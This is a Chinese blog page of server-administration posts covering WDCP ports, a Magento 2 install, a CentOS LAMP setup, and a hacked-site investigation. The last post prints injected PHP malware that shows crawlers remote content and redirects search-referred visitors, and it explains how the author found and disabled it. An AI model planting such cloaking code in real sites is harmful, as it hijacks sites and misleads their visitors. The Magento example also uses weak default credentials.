分类 云计算 下的文章

在WDCP v3里设置站点通过IP和端口访问

环境:wdCP v3.3.6
目的:新建一个站点,且用IP加端口访问

本例使用阿里云ECS实例测试,如您还没有,可点击此查看相关优惠活动

过程:

1.先在“系统设置”中的“WEB”中添加“Web端口”
wdcp-port-1.png

2.保存设置后,发现apache启动失败。日志中提示:Starting httpd: AH00526: Syntax error on line 1 of /www/wdlinux/httpd-2.4.38/conf/vhost/port.conf
wdcp-port-2.png

3.查看apache配置端口的文件内容,将原来带分号的端口(Listen 80;8081;8082)替换成如下边的:

Listen 8081
Listen 8082

wdcp-port-3.png

4.再在站点的配置文件里,将端口修改为非80的,如8082
wdcp-port-4.png

5.保存后访问测试,成功

参考:https://httpd.apache.org/docs/2.4/bind.html

通过命令行安装magento2

测试机:阿里云ECS实例。如果您还没有ECS,可点此查看优惠价格或订购

如果还没有布置好magento2的运行环境,请参考上一篇。

过程:

1.cd /var/www/html # 假如magento2的文件存放在 /var/www/html

2.php bin/magento setup:install --base-url=http://szt.anqun.org/ \
--db-host=localhost --db-name=magento --db-user=root --db-password= \
--admin-firstname=Magento --admin-lastname=User --admin-email=user@example.com \
--admin-user=admin --admin-password=admin123 --language=en_US \
--currency=USD --timezone=America/Chicago --use-rewrites=1 # 安装命令,其中 base-url 是商城网址,db-name是数据库名,db-user是数据库用户,db-password是密码,admin-user是商城后台管理员登录名,admin-password是商城后台管理员密码
magento-cli-install-1.png

3.如果安装成功,会回显随机生成商城后台登录目录,如/admin_1ma81y
magento-cli-install-2.png

4.chown -R apache:apche /var/www/html # 将magento2所在的目录递归更改属主为web进程用户,如apache

5.成功登录到新站点后台
magento-cli-install-3.png

参考:https://devdocs.magento.com/guides/v2.3/install-gde/install/cli/install-cli-install.html

在CentOS7里安装apache2.4 php7.2 mysql 5.6环境

打算安装magento 2.3.1,需要先安装运行环境。步骤如下:

1.yum install epel-release # 安装epel源
2.rpm -Uvh http://rpms.famillecollet.com/enterprise/remi-release-7.rpm # 安装remi源
3.rpm -Uvh http://repo.mysql.com/mysql-community-release-el7-7.noarch.rpm # 安装mysql源
4.yum update # 更新
centos-magento-perpare-1.png
5.yum --enablerepo=remi-php72 install php php-pdo php-mysqlnd php-opcache php-xml php-pecl-mcrypt php-gd php-devel php-intl php-mbstring php-bcmath php-json php-iconv php-soap php-zip # 启用remi php7.2源,安装php7.2及扩展
centos-magento-perpare-2.png
6.yum install mysql-server # 安装mysql 5.6
7.vi /etc/php.ini # 编辑php配置文件,将 memory_limit 值调高,如更改到1280M
centos-magento-perpare-3.png
8.vi /etc/httpd/conf/httpd.conf # 编辑apache配置文件,在适当位置添加 LoadModule rewrite_module modules/mod_rewrite.so , 启用rewrite模块;且将/var/www/html目录的配置内容 AllowOverride None 更改为 AllowOverride All,以让magento的配置文件.htaccess生效
centos-magento-perpare-4.png
9.systemctl restart httpd # 重启apache
10.将magento2的安装文件放到/var/www/html里,从浏览器里访问,开始安装
centos-magento-perpare-5.png

参考:

在阿里云控制台提取“互联网有害信息”网址

问题:Discuz!论坛被恶意批量发布低俗内容,被阿里云风控自动检查到,记录在云盾控制台“互联网有害信息”分类里,因为长网址不直接显示出来,需要将鼠标放在长网址上,才会显示完整。当前云盾控制台无网址导出功能,人工一个个网址复制出来,很费劲。

url-filter-1.png

尝试:
a. 如果是短的网址,可直接在列表显示完整的,直接复制到如Excel表就可以
url-filter-2.png

b. 如果是长的网址,可通过浏览器的“开发人员调试工具”,查看到相应的网页源码,将源码内容复制到如notepad++中,用正规则来替换,如将 =.?"(http://www.hyhp.net/.?)"|.*= 替换为 $1\n
url-filter-3.png

参考:https://stackoverflow.com/questions/45380483/notepad-regex-get-all-full-links-that-begins-with-a-string-in-a-html

查找网站访问被跳转到其它网址原因一例

感谢“*zy”的鼓励和支持。

一网友说他的网站被“黑”了,现象是,在搜索引擎里搜索网址,收录的首页是一个X彩的网站内容,且点击搜索引擎链接进入网站,会随机出现一些其它站点的内容。但直接在浏览器里输入网址就正常。

过程:

1.在网上搜索了一些资料,说有可能是根据访问者的 http User Agent 和 http_referer 来跳转或显示不同内容的
bbs-aliyun-dongshan3-325100-1.png

bbs-aliyun-dongshan3-325100-2.png

2.同一台服务器上的另一个站点不会出现类似的现象,所以就重点看发生问题的站点文件

3.站点是用 ThinkPHP 框架写的,尝试替换 ThinkPHP 的文件内容,无效

4.尝试替换 app 里的内容,也是无效

5.鼓捣了很久(我是门外汉,不懂php编程和网站的安全运维),无意中,看到日志文件中出现 NOTIC: [8] Undefined index: HTTP_REFERER 的字样
bbs-aliyun-dongshan3-325100-3.png

6.找到相应的文件,有以下php代码

<?php
$arr = array('baidu','360','so','Sogou','bing','yisou','sm','google');
for($i=0;$i<count($arr);$i++){
    if (ereg($arr[$i], $_SERVER["HTTP_USER_AGENT"])) {
        $file = file_get_contents('http://bbs.aliyun.com/');
        echo $file;
        exit;
    }
}
$arr1 = array('baidu','360','so','Sogou','bing','yisou','sm','google');
for($j=0;$j<count($arr1);$j++){
    if (ereg($arr1[$j], $_SERVER["HTTP_REFERER"])) {
        Header("Location: https://www.aliyun.com/");
        exit;
    }
}
return array (
  'DB_HOST' => 'localhost',
  'DB_NAME' => 'dbname',
  'DB_USER' => 'dbuser',
  'DB_PWD' => 'dbpassword',
  'DB_PORT' => '3306',
  'DB_PREFIX' => 'xxx_',
);

7.注释掉怀疑的代码(return array 上边的)后测试,正常了

参考:《网站被黑检测》 - http://s.tool.chin az.com/tools/webcheck.aspx